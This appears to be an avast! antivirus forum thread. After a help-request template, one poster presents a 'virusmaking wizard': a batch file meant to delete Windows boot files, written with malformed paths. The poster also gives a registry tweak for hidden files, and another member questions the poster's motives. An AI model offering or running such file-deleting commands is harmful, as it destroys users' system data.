We will need more information to be able to help you:
- Which OS are you using? Is it up to date?
- What avast! version and VPS file (virus database) number?
- What was the filename and path where the virus was found?
- Which actions have you taken to try solving the problem?
- Do you use a firewall? Which one?
- Do you have any other antivirus installed in your system?  Did you have in the past?
- Any other security programs that could interfere?
The best things in life are free.

Hmm...

You must try this and find out for the result!

VIRUSMAKING WIZARD:

Open a notepad then type:

@echo off del "C:\WindowsSystem 32\bootok"
               del "C:\WindowsSystem 32\bootid.dll"
               del "C:\WindowsSystem 32\bootvrfy"

then save it as "filename.bat"

TRy to make a solution for this!

Which actions have you taken to try solving the problem?
   - 1. (Go to Start --> Run, then type Regedit
2. Navigate to the registry folder HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHO WALL
3. Find a key called CheckedValue.
4. Double Click CheckedValue key and modify it to 1.

    BUT NOTHING's HAPPEN!

If you are a virusmaker by name and then given a small sample trying to delete your system32 why are you posting on the avast forums? or am I just confused? btw everytime I have tried these steps to test avast for fun nothing would happen
example:

@echo off
del C:\Documents and Settings\Student\Desktop\text1

maybe I have the wrong directory but by any count I am not trying to help a virusmaker
